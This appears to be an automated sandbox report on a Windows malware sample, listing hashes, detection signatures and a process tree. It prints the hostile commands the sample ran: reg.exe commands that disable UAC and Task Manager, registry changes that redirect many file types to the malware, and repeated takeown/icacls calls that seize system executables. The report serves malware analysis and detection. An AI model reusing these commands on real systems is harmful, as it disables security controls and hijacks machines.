Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system -
submitted
02-10-2024 23:56
Static task
static1
Behavioral task
behavioral1
Sample
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
Resource
win10v2004-20240802-en
General
-
Target
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
-
Size
514KB
-
MD5
65c713d83b613d647d369ed305632930
-
SHA1
eb79bea11c59b78498dbf65679ba1a24203e8d9e
-
SHA256
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878f
-
SHA512
26d9af89110278380c85c8193d44ac1002e4df88dfce7312402f2bd6b6e610e92559600a71068c54a17598429f55a36cc69998cb210f6ceb964d5f53f31032b5
-
SSDEEP
6144:/pW2bgbbV28okoS1oWMkdlZQ5iinNrv26FYLIcw/3ScNAf3:/pW2IoioS6p7q
Malware Config
Signatures
-
Processes:
reg.exe
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
-
Disables Task Manager via registry modification
-
Possible privilege escalation attempt 64 IoCs
Modifies file permissions 1 TTPs 64 IoCs
Modifies system executable filetype association 2 TTPs 1 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1"
-
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Drops file in System32 directory 2 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
- File created C:\Windows\System32\tzsync.exe
- File opened for modification C:\Windows\System32\tzsync.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 13 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\pngfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe RTFDF %1"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe CMDSF %1"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\jpegfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe VBSSF %1"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe HTMWF %1"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1"
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\icofile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1"
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe
- PID 2060
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exepid Process 2060 2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe -
Suspicious use of AdjustPrivilegeToken 50 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"1⤵
- Modifies system executable filetype association
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
- UAC bypass
- Modifies registry key
PID:588
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Modifies registry key
PID:1060
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\bfsvc.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\bfsvc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2632
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\HelpPane.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1840
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\HelpPane.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2532
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\hh.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\hh.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1648
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\splwow64.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1180
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\splwow64.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2152
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\winhlp32.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3036
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\winhlp32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1664
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\write.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\write.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1584
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\raserver.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\raserver.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2332
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\msra.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:648
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msra.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1120
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\quickassist.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\quickassist.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1772
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\sdchange.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdchange.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2820
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\CameraSettingsUIHost.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1080
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\CameraSettingsUIHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1512
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\logagent.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1436
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\logagent.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2092
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\rrinstaller.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2792
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\rrinstaller.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1496
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\gpscript.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\gpscript.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2132
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\mavinject.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2992
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mavinject.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1640
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\provlaunch.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1132
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\provlaunch.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:300
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\msinfo32.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\msinfo32.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:1096
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\runas.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\runas.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1056
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\mstsc.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:840
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\mstsc.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:900
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\SysWOW64\sdiagnhost.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1204
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\SysWOW64\sdiagnhost.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1536
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1740
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1744
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1232
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2976
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:1220
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:660
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1636
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2916
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1668
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:700
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1704
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1168
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:796
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1424
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2448
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2668
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2720
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1684
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Modifies file permissions
PID:2252
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2892
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1216
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2184
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2520
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2372
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2804
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1068
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2288
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1940
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1580
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2208
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2516
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2660
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:668
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:1644
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2728
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2736
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2936
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1864
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2864
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2204
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵
- Possible privilege escalation attempt
PID:2580
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵PID:2104
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:264
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2140
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:2156
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:2824
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:2344
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3084
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3104
-
-
C:\Windows\System32\icacls.exe"C:\Windows\System32\icacls.exe" "C:\Windows\System32\tzsync.exe" /INHERITANCE:e /GRANT:r Admin:(F)2⤵
- Possible privilege escalation attempt
PID:3136
-
-
C:\Windows\System32\takeown.exe"C:\Windows\System32\takeown.exe" /S ZQABOPWE /U Admin /F "C:\Windows\System32\tzsync.exe"2⤵PID:3168
-
-
